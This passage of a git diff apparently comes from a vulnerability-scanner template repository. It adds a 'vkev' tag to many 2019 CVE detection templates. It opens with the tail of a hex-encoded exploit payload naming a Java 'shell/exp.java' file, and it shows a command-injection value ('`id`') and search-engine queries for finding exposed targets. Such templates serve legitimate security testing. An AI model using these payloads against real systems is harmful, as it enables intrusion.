08003a422557483e79dabf0000000f010000160018000000000001000000b481b9030000636f6d2f63646c2f7368656c6c2f6578702e6a617661555405000330e4f66475780b000104e803000004e8030000504b05060000000006000600ff010000c80400000000")}}' diff --git a/http/cves/2019/CVE-2019-11581.yaml b/http/cves/2019/CVE-2019-11581.yaml index 3c32c059857..f26b5d36176 100644 --- a/http/cves/2019/CVE-2019-11581.yaml +++ b/http/cves/2019/CVE-2019-11581.yaml @@ -32,7 +32,7 @@ info: - http.component:"atlassian jira" - http.component:"atlassian confluence" - cpe:"cpe:2.3:a:atlassian:jira" - tags: cve,cve2019,atlassian,jira,ssti,rce,kev + tags: cve,cve2019,atlassian,jira,ssti,rce,kev,vkev http: - method: GET diff --git a/http/cves/2019/CVE-2019-11869.yaml b/http/cves/2019/CVE-2019-11869.yaml index 37373283638..6d6c2b00707 100644 --- a/http/cves/2019/CVE-2019-11869.yaml +++ b/http/cves/2019/CVE-2019-11869.yaml @@ -34,7 +34,7 @@ info: vendor: yuzopro product: yuzo framework: wordpress - tags: cve,cve2019,wpscan,wordpress,wp-plugin,xss,yuzopro + tags: cve,cve2019,wpscan,wordpress,wp-plugin,xss,yuzopro,vkev http: - raw: diff --git a/http/cves/2019/CVE-2019-11886.yaml b/http/cves/2019/CVE-2019-11886.yaml index 1a9f4860d9a..7556a054847 100644 --- a/http/cves/2019/CVE-2019-11886.yaml +++ b/http/cves/2019/CVE-2019-11886.yaml @@ -25,7 +25,7 @@ info: product: yellow_pencil_visual_theme_customizer framework: wordpress fofa-query: body="wp-content/plugins/yellow-pencil-visual-theme-customizer/" && body="wp-" - tags: cve,cve2019,wp,wordpress,wp-plugin,yellow-pencil-visual-theme-customizer + tags: cve,cve2019,wp,wordpress,wp-plugin,yellow-pencil-visual-theme-customizer,vkev flow: http(1) && http(2) diff --git a/http/cves/2019/CVE-2019-12276.yaml b/http/cves/2019/CVE-2019-12276.yaml index 5b26b1309c3..ea409d85ffa 100644 --- a/http/cves/2019/CVE-2019-12276.yaml +++ b/http/cves/2019/CVE-2019-12276.yaml @@ -28,7 +28,7 @@ info: max-request: 1 vendor: grandnode product: grandnode - tags: cve,cve2019,packetstorm,lfi,grandnode + tags: cve,cve2019,packetstorm,lfi,grandnode,vkev http: - method: GET diff --git a/http/cves/2019/CVE-2019-12593.yaml b/http/cves/2019/CVE-2019-12593.yaml index 3610c1a31e9..7351ce5c435 100644 --- a/http/cves/2019/CVE-2019-12593.yaml +++ b/http/cves/2019/CVE-2019-12593.yaml @@ -41,7 +41,7 @@ info: - intitle:"icewarp" - powered by icewarp 10.4.4 - intitle:"icewarp server administration" - tags: cve,cve2019,packetstorm,lfi,icewarp + tags: cve,cve2019,packetstorm,lfi,icewarp,vkev http: - method: GET diff --git a/http/cves/2019/CVE-2019-12725.yaml b/http/cves/2019/CVE-2019-12725.yaml index 8f9461db647..6a6c94385d9 100644 --- a/http/cves/2019/CVE-2019-12725.yaml +++ b/http/cves/2019/CVE-2019-12725.yaml @@ -29,7 +29,7 @@ info: shodan-query: http.title:"zeroshell" fofa-query: title="zeroshell" google-query: intitle:"zeroshell" - tags: cve,cve2019,packetstorm,rce,zeroshell + tags: cve,cve2019,packetstorm,rce,zeroshell,vkev http: - method: GET diff --git a/http/cves/2019/CVE-2019-12985.yaml b/http/cves/2019/CVE-2019-12985.yaml index c6e86b53a94..e33a6bf8a33 100644 --- a/http/cves/2019/CVE-2019-12985.yaml +++ b/http/cves/2019/CVE-2019-12985.yaml @@ -31,7 +31,7 @@ info: - http.title:"citrix sd-wan" fofa-query: title="citrix sd-wan" google-query: intitle:"citrix sd-wan" - tags: cve,cve2019,citrix,rce,unauth,oast,tenable + tags: cve,cve2019,citrix,rce,unauth,oast,tenable,vkev http: - raw: diff --git a/http/cves/2019/CVE-2019-12986.yaml b/http/cves/2019/CVE-2019-12986.yaml index a65faab861a..1cdbda8a2fd 100644 --- a/http/cves/2019/CVE-2019-12986.yaml +++ b/http/cves/2019/CVE-2019-12986.yaml @@ -31,7 +31,7 @@ info: - http.title:"citrix sd-wan" fofa-query: title="citrix sd-wan" google-query: intitle:"citrix sd-wan" - tags: cve2019,cve,unauth,oast,tenable,citrix,rce + tags: cve2019,cve,unauth,oast,tenable,citrix,rce,vkev http: - raw: diff --git a/http/cves/2019/CVE-2019-12987.yaml b/http/cves/2019/CVE-2019-12987.yaml index 6f71a4017be..d16ad5753e3 100644 --- a/http/cves/2019/CVE-2019-12987.yaml +++ b/http/cves/2019/CVE-2019-12987.yaml @@ -31,7 +31,7 @@ info: - http.title:"citrix sd-wan" fofa-query: title="citrix sd-wan" google-query: intitle:"citrix sd-wan" - tags: cve,cve2019,citrix,rce,unauth,oast,tenable + tags: cve,cve2019,citrix,rce,unauth,oast,tenable,vkev http: - raw: diff --git a/http/cves/2019/CVE-2019-12988.yaml b/http/cves/2019/CVE-2019-12988.yaml index 50e2daf24c1..1a0896edf4f 100644 --- a/http/cves/2019/CVE-2019-12988.yaml +++ b/http/cves/2019/CVE-2019-12988.yaml @@ -31,7 +31,7 @@ info: - http.title:"citrix sd-wan" fofa-query: title="citrix sd-wan" google-query: intitle:"citrix sd-wan" - tags: cve,cve2019,rce,unauth,oast,tenable,citrix + tags: cve,cve2019,rce,unauth,oast,tenable,citrix,vkev http: - raw: diff --git a/http/cves/2019/CVE-2019-12990.yaml b/http/cves/2019/CVE-2019-12990.yaml index a44be12b733..16228f5bbfe 100644 --- a/http/cves/2019/CVE-2019-12990.yaml +++ b/http/cves/2019/CVE-2019-12990.yaml @@ -32,7 +32,7 @@ info: - http.title:"citrix sd-wan" fofa-query: title="citrix sd-wan" google-query: intitle:"citrix sd-wan" - tags: cve,cve2019,citrix,rce,unauth,tenable,intrusive + tags: cve,cve2019,citrix,rce,unauth,tenable,intrusive,vkev http: - raw: diff --git a/http/cves/2019/CVE-2019-13101.yaml b/http/cves/2019/CVE-2019-13101.yaml index 89261ad18c5..2b2c1d5cc81 100644 --- a/http/cves/2019/CVE-2019-13101.yaml +++ b/http/cves/2019/CVE-2019-13101.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: dlink product: dir-600m - tags: cve2019,cve,packetstorm,edb,dlink,router,iot + tags: cve2019,cve,packetstorm,edb,dlink,router,iot,vkev http: - raw: diff --git a/http/cves/2019/CVE-2019-13372.yaml b/http/cves/2019/CVE-2019-13372.yaml index 304f4e630a6..5b51305c328 100644 --- a/http/cves/2019/CVE-2019-13372.yaml +++ b/http/cves/2019/CVE-2019-13372.yaml @@ -25,7 +25,7 @@ info: vendor: dlink product: central_wifimanager shodan-query: html:"D-Link Central WiFiManager" - tags: cve,cve2019,d-link,wifimanager + tags: cve,cve2019,d-link,wifimanager,vkev variables: string: "{{rand_text_alpha(10)}}" diff --git a/http/cves/2019/CVE-2019-13462.yaml b/http/cves/2019/CVE-2019-13462.yaml index ed26f81eeca..acf145230cf 100644 --- a/http/cves/2019/CVE-2019-13462.yaml +++ b/http/cves/2019/CVE-2019-13462.yaml @@ -29,7 +29,7 @@ info: shodan-query: http.title:"lansweeper - login" fofa-query: title="lansweeper - login" google-query: intitle:"lansweeper - login" - tags: cve,cve2019,sqli,lansweeper + tags: cve,cve2019,sqli,lansweeper,vkev http: - method: GET diff --git a/http/cves/2019/CVE-2019-14205.yaml b/http/cves/2019/CVE-2019-14205.yaml index c61384d1361..15e78333aa8 100644 --- a/http/cves/2019/CVE-2019-14205.yaml +++ b/http/cves/2019/CVE-2019-14205.yaml @@ -29,7 +29,7 @@ info: vendor: nevma product: adaptive_images framework: wordpress - tags: cve,cve2019,wordpress,wp-plugin,lfi,wp,nevma + tags: cve,cve2019,wordpress,wp-plugin,lfi,wp,nevma,vkev http: - method: GET diff --git a/http/cves/2019/CVE-2019-14223.yaml b/http/cves/2019/CVE-2019-14223.yaml index 84fe07d2dd5..7e120de3565 100644 --- a/http/cves/2019/CVE-2019-14223.yaml +++ b/http/cves/2019/CVE-2019-14223.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: alfresco product: alfresco - tags: cve,cve2019,redirect,alfresco + tags: cve,cve2019,redirect,alfresco,vkev http: - method: POST diff --git a/http/cves/2019/CVE-2019-14251.yaml b/http/cves/2019/CVE-2019-14251.yaml index ac66e9143e1..85b987746e0 100644 --- a/http/cves/2019/CVE-2019-14251.yaml +++ b/http/cves/2019/CVE-2019-14251.yaml @@ -26,7 +26,7 @@ info: max-request: 2 vendor: temenos product: t24 - tags: cve,cve2019,temenos,lfi,unauth + tags: cve,cve2019,temenos,lfi,unauth,vkev http: - method: GET diff --git a/http/cves/2019/CVE-2019-15107.yaml b/http/cves/2019/CVE-2019-15107.yaml index 97b4b0b18e1..4e642884b2f 100644 --- a/http/cves/2019/CVE-2019-15107.yaml +++ b/http/cves/2019/CVE-2019-15107.yaml @@ -30,7 +30,7 @@ info: shodan-query: http.title:"webmin" fofa-query: title="webmin" google-query: intitle:"webmin" - tags: cve,cve2019,packetstorm,webmin,rce,kev,edb + tags: cve,cve2019,packetstorm,webmin,rce,kev,edb,vkev http: - raw: diff --git a/http/cves/2019/CVE-2019-15642.yaml b/http/cves/2019/CVE-2019-15642.yaml index 4a1314170c8..b9d07e9282d 100644 --- a/http/cves/2019/CVE-2019-15642.yaml +++ b/http/cves/2019/CVE-2019-15642.yaml @@ -34,7 +34,7 @@ info: - http.title:"webmin" fofa-query: title="webmin" google-query: intitle:"webmin" - tags: cve,cve2019,webmin,rce + tags: cve,cve2019,webmin,rce,vkev variables: cmd: '`id`' diff --git a/http/cves/2019/CVE-2019-15774.yaml b/http/cves/2019/CVE-2019-15774.yaml index bc1a76b0ba5..dc06b2782da 100644 --- a/http/cves/2019/CVE-2019-15774.yaml +++ b/http/cves/2019/CVE-2019-15774.yaml @@ -25,7 +25,7 @@ info: shodan-query: http.html:"/wp-content/plugins/nd-booking" fofa-query: body="/wp-content/plugins/nd-booking/" publicwww-query: "/wp-content/plugins/nd-booking/" - tags: cve,cve2019,wordpress,wp-plugin,nd-booking,intrusive + tags: cve,cve2019,wordpress,wp-plugin,nd-booking,intrusive,vkev flow: http(1) && http(2) diff --git a/http/cves/2019/CVE-2019-16057.yaml b/http/cves/2019/CVE-2019-16057.yaml index 843e14534ca..dfa105ed001 100644 --- a/http/cves/2019/CVE-2019-16057.yaml +++ b/http/cves/2019/CVE-2019-16057.yaml @@ -33,7 +33,7 @@ info: - html:"ShareCenter" - http.html:"sharecenter" fofa-query: body="sharecenter" - tags: cve,cve2019,lfi,rce,kev,sharecenter,dlink + tags: cve,cve2019,lfi,rce,kev,sharecenter,dlink,vkev http: - method: GET diff --git a/http/cves/2019/CVE-2019-16278.yaml b/http/cves/2019/CVE-2019-16278.yaml index d59b953d36a..712b5496fdd 100644 --- a/http/cves/2019/CVE-2019-16278.yaml +++ b/http/cves/2019/CVE-2019-16278.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: nazgul product: nostromo_nhttpd - tags: cve,cve2019,edb,rce,packetstorm,nazgul,kev + tags: cve,cve2019,edb,rce,packetstorm,nazgul,kev,vkev http: - raw: diff --git a/http/cves/2019/CVE-2019-1653.yaml b/http/cves/2019/CVE-2019-1653.yaml index 566b8ad6236..6c4841a7bee 100644 --- a/http/cves/2019/CVE-2019-1653.yaml +++ b/http/cves/2019/CVE-2019-1653.yaml @@ -28,7 +28,7 @@ info: max-request: 1 vendor: cisco product: rv320_firmware - tags: cve,cve2019,packetstorm,kev,edb,cisco,router,exposure + tags: cve,cve2019,packetstorm,kev,edb,cisco,router,exposure,vkev http: - method: GET diff --git a/http/cves/2019/CVE-2019-16662.yaml b/http/cves/2019/CVE-2019-16662.yaml index 5f78bd0be46..b59c401289d 100644 --- a/http/cves/2019/CVE-2019-16662.yaml +++ b/http/cves/2019/CVE-2019-16662.yaml @@ -30,7 +30,7 @@ info: shodan-query: http.title:"rconfig" fofa-query: title="rconfig" google-query: intitle:"rconfig" - tags: cve2019,cve,intrusive,rconfig,packetstorm,rce + tags: cve2019,cve,intrusive,rconfig,packetstorm,rce,vkev http: - method: GET diff --git a/http/cves/2019/CVE-2019-16759.yaml b/http/cves/2019/CVE-2019-16759.yaml index a4604e28940..1740dd914c2 100644 --- a/http/cves/2019/CVE-2019-16759.yaml +++ b/http/cves/2019/CVE-2019-16759.yaml @@ -40,7 +40,7 @@ info: google-query: - intext:"powered by vbulletin" - intitle:"powered by vbulletin" - tags: cve,cve2019,rce,kev,seclists,vbulletin + tags: cve,cve2019,rce,kev,seclists,vbulletin,vkev http: - raw: diff --git a/http/cves/2019/CVE-2019-16920.yaml b/http/cves/2019/CVE-2019-16920.yaml index 8779c15e6ab..f149c94fd57 100644 --- a/http/cves/2019/CVE-2019-16920.yaml +++ b/http/cves/2019/CVE-2019-16920.yaml @@ -27,7 +27,7 @@ info: max-request: 3 vendor: dlink product: dir-655_firmware - tags: cve2019,cve,dlink,rce,router,unauth,kev + tags: cve2019,cve,dlink,rce,router,unauth,kev,vkev http: - raw: diff --git a/http/cves/2019/CVE-2019-16932.yaml b/http/cves/2019/CVE-2019-16932.yaml index 32fe05e91e7..fbdc1c73f58 100644 --- a/http/cves/2019/CVE-2019-16932.yaml +++ b/http/cves/2019/CVE-2019-16932.yaml @@ -29,7 +29,7 @@ info: vendor: themeisle product: visualizer framework: wordpress - tags: cve,cve2019,wp-plugin,ssrf,wordpress,oast,unauth,wpscan,intrusive,themeisle,xss + tags: cve,cve2019,wp-plugin,ssrf,wordpress,oast,unauth,wpscan,intrusive,themeisle,xss,vkev flow: http(1) && http(2) http: diff --git a/http/cves/2019/CVE-2019-16996.yaml b/http/cves/2019/CVE-2019-16996.yaml index c575651eea2..5e22409854a 100644 --- a/http/cves/2019/CVE-2019-16996.yaml +++ b/http/cves/2019/CVE-2019-16996.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: metinfo product: metinfo - tags: cve2019,cve,metinfo,sqli + tags: cve2019,cve,metinfo,sqli,vkev http: - method: GET diff --git a/http/cves/2019/CVE-2019-17228.yaml b/http/cves/2019/CVE-2019-17228.yaml index 9bfecc6d4da..264db93804e 100644 --- a/http/cves/2019/CVE-2019-17228.yaml +++ b/http/cves/2019/CVE-2019-17228.yaml @@ -26,7 +26,7 @@ info: product: motors_-_car_dealer\,_classifieds_\&_listing framework: wordpress fofa-query: body="wp-content/plugins/motors-car-dealership-classified-listings/" && body="wp-" - tags: cve,cve2019,wp,wordpress,wp-plugin,motors-car-dealership-classified-listings,intrusive + tags: cve,cve2019,wp,wordpress,wp-plugin,motors-car-dealership-classified-listings,intrusive,vkev variables: single_name: "{{randstr}}" diff --git a/http/cves/2019/CVE-2019-17230.yaml b/http/cves/2019/CVE-2019-17230.yaml index eef56ade084..14cafc1459d 100644 --- a/http/cves/2019/CVE-2019-17230.yaml +++ b/http/cves/2019/CVE-2019-17230.yaml @@ -24,7 +24,7 @@ info: product: onetone framework: wordpress publicwww-query: "/wp-content/themes/onetone" - tags: cve,cve2019,wordpress,wp-theme,wp,onetone + tags: cve,cve2019,wordpress,wp-theme,wp,onetone,vkev flow: http(1) && http(2) diff --git a/http/cves/2019/CVE-2019-17231.yaml b/http/cves/2019/CVE-2019-17231.yaml index f6957a6e0b3..30ae503d049 100644 --- a/http/cves/2019/CVE-2019-17231.yaml +++ b/http/cves/2019/CVE-2019-17231.yaml @@ -24,7 +24,7 @@ info: product: onetone framework: wordpress publicwww-query: "/wp-content/themes/onetone" - tags: cve,cve2019,wordpress,wp-theme,wp,onetone,xss,intrusive + tags: cve,cve2019,wordpress,wp-theme,wp,onetone,xss,intrusive,vkev variables: string: "{{rand_text_numeric(13)}}" diff --git a/http/cves/2019/CVE-2019-17232.yaml b/http/cves/2019/CVE-2019-17232.yaml index 0ef9b232c75..5476a55bd39 100644 --- a/http/cves/2019/CVE-2019-17232.yaml +++ b/http/cves/2019/CVE-2019-17232.yaml @@ -28,7 +28,7 @@ info: publicwww-query: "/wp-content/plugins/ultimate-faqs" shodan-query: http.html:"/wp-content/plugins/ultimate-faqs" fofa-query: body="/wp-content/plugins/ultimate-faqs" - tags: cve,cve2019,wordpress,wp-plugin,wp,ultimate-faqs,unauth,intrusive + tags: cve,cve2019,wordpress,wp-plugin,wp,ultimate-faqs,unauth,intrusive,vkev variables: question: "{{randstr}}" diff --git a/http/cves/2019/CVE-2019-17233.yaml b/http/cves/2019/CVE-2019-17233.yaml index 66ccf9d2abf..e6bff7215f5 100644 --- a/http/cves/2019/CVE-2019-17233.yaml +++ b/http/cves/2019/CVE-2019-17233.yaml @@ -23,7 +23,7 @@ info: product: ultimate_faq framework: wordpress publicwww-query: "/wp-content/plugins/ultimate-faqs" - tags: cve,cve2019,wordpress,wp-plugin,wp,ultimate-faqs,intrusive + tags: cve,cve2019,wordpress,wp-plugin,wp,ultimate-faqs,intrusive,vkev flow: http(1) && http(2) diff --git a/http/cves/2019/CVE-2019-17270.yaml b/http/cves/2019/CVE-2019-17270.yaml index dbd5a2826cf..06578a3450e 100644 --- a/http/cves/2019/CVE-2019-17270.yaml +++ b/http/cves/2019/CVE-2019-17270.yaml @@ -28,7 +28,7 @@ info: max-request: 1 vendor: yachtcontrol product: yachtcontrol - tags: cve,cve2019,rce,yachtcontrol,edb,packetstorm + tags: cve,cve2019,rce,yachtcontrol,edb,packetstorm,vkev http: - method: GET diff --git a/http/cves/2019/CVE-2019-17503.yaml b/http/cves/2019/CVE-2019-17503.yaml index ba927099ad0..7d9c2f6d79b 100644 --- a/http/cves/2019/CVE-2019-17503.yaml +++ b/http/cves/2019/CVE-2019-17503.yaml @@ -24,7 +24,7 @@ info: max-request: 2 vendor: kirona product: dynamic_resource_scheduling - tags: cve,cve2019,exposure,edb,packetstorm,kirona + tags: cve,cve2019,exposure,edb,packetstorm,kirona,vkev http: - method: GET diff --git a/http/cves/2019/CVE-2019-17506.yaml b/http/cves/2019/CVE-2019-17506.yaml index 267d0e8cf64..71c6eba38a4 100644 --- a/http/cves/2019/CVE-2019-17506.yaml +++ b/http/cves/2019/CVE-2019-17506.yaml @@ -28,7 +28,7 @@ info: max-request: 1 vendor: dlink product: dir-868l_b1_firmware - tags: cve,cve2019,dlink,router,disclosure + tags: cve,cve2019,dlink,router,disclosure,vkev http: - method: POST diff --git a/http/cves/2019/CVE-2019-17538.yaml b/http/cves/2019/CVE-2019-17538.yaml index 41e3421bee5..17a26a743de 100644 --- a/http/cves/2019/CVE-2019-17538.yaml +++ b/http/cves/2019/CVE-2019-17538.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: jnoj product: jiangnan_online_judge - tags: cve2019,cve,jnoj,lfi + tags: cve2019,cve,jnoj,lfi,vkev http: - raw: diff --git a/http/cves/2019/CVE-2019-17558.yaml b/http/cves/2019/CVE-2019-17558.yaml index e44859ee18f..c69e1b861f4 100644 --- a/http/cves/2019/CVE-2019-17558.yaml +++ b/http/cves/2019/CVE-2019-17558.yaml @@ -37,7 +37,7 @@ info: google-query: - intitle:"apache solr" - intitle:"solr admin" - tags: cve,cve2019,kev,packetstorm,apache,rce,solr,oast + tags: cve,cve2019,kev,packetstorm,apache,rce,solr,oast,vkev http: - raw: diff --git a/http/cves/2019/CVE-2019-17564.yaml b/http/cves/2019/CVE-2019-17564.yaml index 5e0815e5f55..f83f8fc2bd4 100644 --- a/http/cves/2019/CVE-2019-17564.yaml +++ b/http/cves/2019/CVE-2019-17564.yaml @@ -25,7 +25,7 @@ info: vendor: apache product: dubbo fofa-query: app="apache-dubbo" - tags: cve,cve2019,dubbo,apache,deserialization,rce + tags: cve,cve2019,dubbo,apache,deserialization,rce,vkev variables: interface: "com.example.TestService" diff --git a/http/cves/2019/CVE-2019-17574.yaml b/http/cves/2019/CVE-2019-17574.yaml index 719f99c9f70..0f0fa89ea11 100644 --- a/http/cves/2019/CVE-2019-17574.yaml +++ b/http/cves/2019/CVE-2019-17574.yaml @@ -33,7 +33,7 @@ info: shodan-query: http.html:/wp-content/plugins/popup-maker/ fofa-query: body=/wp-content/plugins/popup-maker/ publicwww-query: "/wp-content/plugins/popup-maker/" - tags: cve,cve2019,wpscan,wp,wordpress,wp-plugin,disclosure,popup-maker,auth-bypass,code-atlantic + tags: cve,cve2019,wpscan,wp,wordpress,wp-plugin,disclosure,popup-maker,auth-bypass,code-atlantic,vkev http: - raw: diff --git a/http/cves/2019/CVE-2019-1821.yaml b/http/cves/2019/CVE-2019-1821.yaml index a3a66d637db..08ffa49337a 100644 --- a/http/cves/2019/CVE-2019-1821.yaml +++ b/http/cves/2019/CVE-2019-1821.yaml @@ -28,7 +28,7 @@ info: shodan-query: http.title:"prime infrastructure" fofa-query: title="prime infrastructure" google-query: intitle:"prime infrastructure" - tags: cve,cve2019,packetstorm,rce,fileupload,unauth,intrusive,cisco + tags: cve,cve2019,packetstorm,rce,fileupload,unauth,intrusive,cisco,vkev http: - raw: diff --git a/http/cves/2019/CVE-2019-18371.yaml b/http/cves/2019/CVE-2019-18371.yaml index ca62cf134a6..adf36e7b325 100644 --- a/http/cves/2019/CVE-2019-18371.yaml +++ b/http/cves/2019/CVE-2019-18371.yaml @@ -26,7 +26,7 @@ info: max-request: 1 vendor: mi product: millet_router_3g_firmware - tags: cve2019,cve,lfi,router,mi,xiaomi + tags: cve2019,cve,lfi,router,mi,xiaomi,vkev http: - method: GET diff --git a/http/cves/2019/CVE-2019-18393.yaml b/http/cves/2019/CVE-2019-18393.yaml index 1f376bcc171..4348cc27ef8 100644 --- a/http/cves/2019/CVE-2019-18393.yaml +++ b/http/cves/2019/CVE-2019-18393.yaml @@ -36,7 +36,7 @@ info: google-query: - intitle:"openfire" - intitle:"openfire admin console" - tags: cve,cve2019,openfire,lfi,igniterealtime + tags: cve,cve2019,openfire,lfi,igniterealtime,vkev http: - method: GET diff --git a/http/cves/2019/CVE-2019-18394.yaml b/http/cves/2019/CVE-2019-18394.yaml index ccdbca2afcb..f2f06fc16ab 100644 --- a/http/cves/2019/CVE-2019-18394.yaml +++ b/http/cves/2019/CVE-2019-18394.yaml @@ -37,7 +37,7 @@ info: google-query: - intitle:"openfire" - intitle:"openfire admin console" - tags: cve,cve2019,ssrf,openfire,oast,igniterealtime + tags: cve,cve2019,ssrf,openfire,oast,igniterealtime,vkev http: - method: GET diff --git a/http/cves/2019/CVE-2019-18818.yaml b/http/cves/2019/CVE-2019-18818.yaml index d16b719bbda..6c5ddf428b3 100644 --- a/http/cves/2019/CVE-2019-18818.yaml +++ b/http/cves/2019/CVE-2019-18818.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: strapi product: strapi - tags: cve,cve2019,strapi,auth-bypass,intrusive,edb + tags: cve,cve2019,strapi,auth-bypass,intrusive,edb,vkev http: - raw: diff --git a/http/cves/2019/CVE-2019-19781.yaml b/http/cves/2019/CVE-2019-19781.yaml index 6028fc700bd..406c5e23fd8 100644 --- a/http/cves/2019/CVE-2019-19781.yaml +++ b/http/cves/2019/CVE-2019-19781.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: citrix product: application_delivery_controller_firmware - tags: cve,cve2019,lfi,kev,packetstorm,citrix + tags: cve,cve2019,lfi,kev,packetstorm,citrix,vkev http: - method: GET diff --git a/http/cves/2019/CVE-2019-19824.yaml b/http/cves/2019/CVE-2019-19824.yaml index b03ca17afc8..33e2bb3db7c 100644 --- a/http/cves/2019/CVE-2019-19824.yaml +++ b/http/cves/2019/CVE-2019-19824.yaml @@ -28,7 +28,7 @@ info: max-request: 1 vendor: totolink product: a3002ru_firmware - tags: cve,cve2019,totolink,rce,router + tags: cve,cve2019,totolink,rce,router,vkev http: - raw: diff --git a/http/cves/2019/CVE-2019-19985.yaml b/http/cves/2019/CVE-2019-19985.yaml index 12615e871f7..56b6ace068b 100644 --- a/http/cves/2019/CVE-2019-19985.yaml +++ b/http/cves/2019/CVE-2019-19985.yaml @@ -28,7 +28,7 @@ info: vendor: icegram product: email_subscribers_\&_newsletters framework: wordpress - tags: cve,cve2019,wordpress,wp-plugin,edb,packetstorm,icegram + tags: cve,cve2019,wordpress,wp-plugin,edb,packetstorm,icegram,vkev http: - method: GET diff --git a/http/cves/2019/CVE-2019-20085.yaml b/http/cves/2019/CVE-2019-20085.yaml index dbaab8a2a87..e4ab099ff76 100644 --- a/http/cves/2019/CVE-2019-20085.yaml +++ b/http/cves/2019/CVE-2019-20085.yaml @@ -28,7 +28,7 @@ info: max-request: 1 vendor: tvt product: nvms-1000_firmware - tags: cve,cve2019,iot,lfi,kev,edb,packetstorm,tvt + tags: cve,cve2019,iot,lfi,kev,edb,packetstorm,tvt,vkev http: - method: GET diff --git a/http/cves/2019/CVE-2019-20504.yaml b/http/cves/2019/CVE-2019-20504.yaml index 491256b3235..1cef3065b70 100644 --- a/http/cves/2019/CVE-2019-20504.yaml +++ b/http/cves/2019/CVE-2019-20504.yaml @@ -24,7 +24,7 @@ info: vendor: quest product: kace_systems_management shodan-query: html:"K1000 Logo" - tags: cve,cve2019,k1000,kace,rce + tags: cve,cve2019,k1000,kace,rce,vkev flow: http(1) && http(2) diff --git a/http/cves/2019/CVE-2019-20933.yaml b/http/cves/2019/CVE-2019-20933.yaml index ffc29e5176d..34972c32086 100644 --- a/http/cves/2019/CVE-2019-20933.yaml +++ b/http/cves/2019/CVE-2019-20933.yaml @@ -33,7 +33,7 @@ info: - influxdb fofa-query: title="influxdb - admin interface" google-query: intitle:"influxdb - admin interface" - tags: cve,cve2019,unauth,db,influxdb,misconfig,influxdata + tags: cve,cve2019,unauth,db,influxdb,misconfig,influxdata,vkev http: - method: GET diff --git a/http/cves/2019/CVE-2019-25141.yaml b/http/cves/2019/CVE-2019-25141.yaml index 8cd17618617..16b311ef8fd 100644 --- a/http/cves/2019/CVE-2019-25141.yaml +++ b/http/cves/2019/CVE-2019-25141.yaml @@ -25,7 +25,7 @@ info: product: easy_wp_smtp framework: wordpress publicwww-query: "/wp-content/plugins/easy-wp-smtp/" - tags: cve,cve2019,wordpress,wp-plugin,wp,file-upload,easy-wp-smtp,intrusive + tags: cve,cve2019,wordpress,wp-plugin,wp,file-upload,easy-wp-smtp,intrusive,vkev variables: filename: "{{rand_text_alpha(10)}}" diff --git a/http/cves/2019/CVE-2019-2588.yaml b/http/cves/2019/CVE-2019-2588.yaml index c4e89cc54be..d397cde6d69 100644 --- a/http/cves/2019/CVE-2019-2588.yaml +++ b/http/cves/2019/CVE-2019-2588.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: oracle product: business_intelligence_publisher - tags: cve,cve2019,oracle,lfi + tags: cve,cve2019,oracle,lfi,vkev http: - method: GET diff --git a/http/cves/2019/CVE-2019-2616.yaml b/http/cves/2019/CVE-2019-2616.yaml index 98cb1799911..c82ac9f2df8 100644 --- a/http/cves/2019/CVE-2019-2616.yaml +++ b/http/cves/2019/CVE-2019-2616.yaml @@ -26,7 +26,7 @@ info: max-request: 1 vendor: oracle product: business_intelligence_publisher - tags: cve,cve2019,oracle,xxe,oast,kev,edb + tags: cve,cve2019,oracle,xxe,oast,kev,edb,vkev http: - raw: diff --git a/http/cves/2019/CVE-2019-2725.yaml b/http/cves/2019/CVE-2019-2725.yaml index 8a24ec6564e..5db4d060b27 100644 --- a/http/cves/2019/CVE-2019-2725.yaml +++ b/http/cves/2019/CVE-2019-2725.yaml @@ -26,7 +26,7 @@ info: max-request: 2 vendor: oracle product: agile_plm - tags: cve,cve2019,packetstorm,kev,edb,oracle,weblogic,rce + tags: cve,cve2019,packetstorm,kev,edb,oracle,weblogic,rce,vkev http: - raw: diff --git a/http/cves/2019/CVE-2019-2729.yaml b/http/cves/2019/CVE-2019-2729.yaml index 65a8e7eb4a7..b1ccf33c557 100644 --- a/http/cves/2019/CVE-2019-2729.yaml +++ b/http/cves/2019/CVE-2019-2729.yaml @@ -28,7 +28,7 @@ info: max-request: 3 vendor: oracle product: communications_diameter_signaling_router - tags: cve,cve2019,oracle,rce,weblogic + tags: cve,cve2019,oracle,rce,weblogic,vkev http: - raw: diff --git a/http/cves/2019/CVE-2019-2767.yaml b/http/cves/2019/CVE-2019-2767.yaml index aacc2348f4c..07fe2e86c72 100644 --- a/http/cves/2019/CVE-2019-2767.yaml +++ b/http/cves/2019/CVE-2019-2767.yaml @@ -26,7 +26,7 @@ info: max-request: 1 vendor: oracle product: bi_publisher - tags: cve,cve2019,edb,oracle,xxe,oast + tags: cve,cve2019,edb,oracle,xxe,oast,vkev http: - raw: diff --git a/http/cves/2019/CVE-2019-3396.yaml b/http/cves/2019/CVE-2019-3396.yaml index 8dfeb3be3d4..9dcff87c9f7 100644 --- a/http/cves/2019/CVE-2019-3396.yaml +++ b/http/cves/2019/CVE-2019-3396.yaml @@ -29,7 +29,7 @@ info: - http.component:"Atlassian Confluence" - cpe:"cpe:2.3:a:atlassian:confluence" - http.component:"atlassian confluence" - tags: cve,cve2019,atlassian,confluence,lfi,rce,kev,packetstorm + tags: cve,cve2019,atlassian,confluence,lfi,rce,kev,packetstorm,vkev http: - raw: diff --git a/http/cves/2019/CVE-2019-3398.yaml b/http/cves/2019/CVE-2019-3398.yaml index c7a95651c60..5c0a8f3feae 100644 --- a/http/cves/2019/CVE-2019-3398.yaml +++ b/http/cves/2019/CVE-2019-3398.yaml @@ -31,7 +31,7 @@ info: shodan-query: - http.component:"atlassian confluence" - cpe:"cpe:2.3:a:atlassian:confluence" - tags: cve,cve2019,packetstorm,atlassian,confluence,rce,authenticated,intrusive,kev + tags: cve,cve2019,packetstorm,atlassian,confluence,rce,authenticated,intrusive,kev,vkev variables: num1: "{{rand_int(800000, 999999)}}" num2: "{{rand_int(800000, 999999)}}" diff --git a/http/cves/2019/CVE-2019-3929.yaml b/http/cves/2019/CVE-2019-3929.yaml index 